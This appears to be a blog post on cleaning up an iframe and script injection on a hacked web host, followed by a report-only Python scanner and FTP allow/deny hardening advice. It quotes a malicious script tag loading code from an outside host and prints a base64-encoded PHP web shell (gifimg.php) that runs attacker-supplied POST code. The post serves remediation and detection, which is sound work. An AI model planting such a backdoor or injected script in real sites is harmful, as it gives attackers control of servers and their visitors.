

Iframe Injection Prevention

How to Recover after injection

My hosting account was broken into. I figured out that my FTP client had been infected and that, through it, they got my passwords. They took the opportunity to inject an <iframe> into quite a few of my files; index.php, html, htm, asp … as well as default.php, html, htm, asp … and main.php, html, htm, asp … are prioritized. These hacks insert the <iframe> tag before or after the <body> tag, or they add the <iframe> at the end of the file. I was interested and looked thoroughly through all my files. I figured out that not only <iframe> tags had been injected, but also JavaScript, which looks like this: <script src=http://anydisk.anyprinting.com/webfolder/index.php ></script>.

After the injection, many scripts came out that search through each and every file in the hosting directory and clean up the infected scripts, but I do not recommend using automatic deletion. Do it manually. Use scanning, which is very convenient in this case. I personally used the exploit plugin, with which I scanned and found part of the iframe injection. I manually scanned with the exploit plugin for JavaScript injection and deleted everything manually. And that was the end of it. I found a file named gifimg.php with the following content:

<?php  eval(base64_decode(‘aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29

kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7′));?>

in all the images directories.

How to clean up injection?

I advise you to manually remove the injected <iframe> tags from the infected files. You should also delete the JavaScript-infected files. Check your directories named images for files named gifimg.php and delete them.
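
As an added example (not part of the original post and not the plugin the author used), here is a report-only Python scanner for the three artifacts described above: injected <iframe> tags, <script> tags with a remote src, and eval(base64_decode(...)) files such as gifimg.php. It lists candidates for manual review and decodes the base64 literal without executing it; the function names are assumptions made for illustration.

```python
import base64
import re
from pathlib import Path

WEB_EXTS = {".php", ".html", ".htm", ".asp"}  # file types the post says were hit
PATTERNS = {  # hits are review candidates; legitimate iframes and scripts match too
    "iframe": re.compile(r"<iframe\b[^>]*", re.I),
    "remote-script": re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?https?://[^\s\"'>]+", re.I),
    "eval-base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
}
B64_ARG = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]")

def decode_payload(text):
    """Statically decode the first base64_decode('...') literal; never runs it."""
    m = B64_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode("".join(m.group(1).split())).decode("utf-8", "replace")
    except ValueError:  # malformed base64
        return None

def scan_file(path):
    """Return (label, line_number, detail) findings for one file."""
    text = path.read_text(encoding="utf-8", errors="replace")
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append((label, lineno, m.group(0)[:100]))
    decoded = decode_payload(text)
    if decoded is not None:
        findings.append(("decoded-payload", 0, decoded[:100]))
    if path.name.lower() == "gifimg.php":  # file name reported in the post
        findings.append(("dropper-filename", 0, path.name))
    return findings

def scan_tree(root):
    """Report-only walk of a web root; nothing is modified or deleted."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            hits = scan_file(path)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report
```

Call scan_tree() on a copy of the web root and go through each reported file by hand before removing anything.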

How to secure myself from injection?

  1. You should update your antivirus software.
  2. Scan your computer for infected files.
  3. If you are running your hosting with a web-based platform such as a CP (Control Panel), you should filter the FTP connection and allow only your personal IP. In order to do this, please follow the next steps:

a) ftp.allow with the following content:

ALL:   95.87.228.123

In place of 95.87.228.123, write your personal IP. This will allow FTP from the chosen IP.

b) ftp.deny with content:

ALL:   ALL

This will forbid FTP access to all but the IP selected in point a).

That’s all, good luck!


Posted in Wordpress Injection.
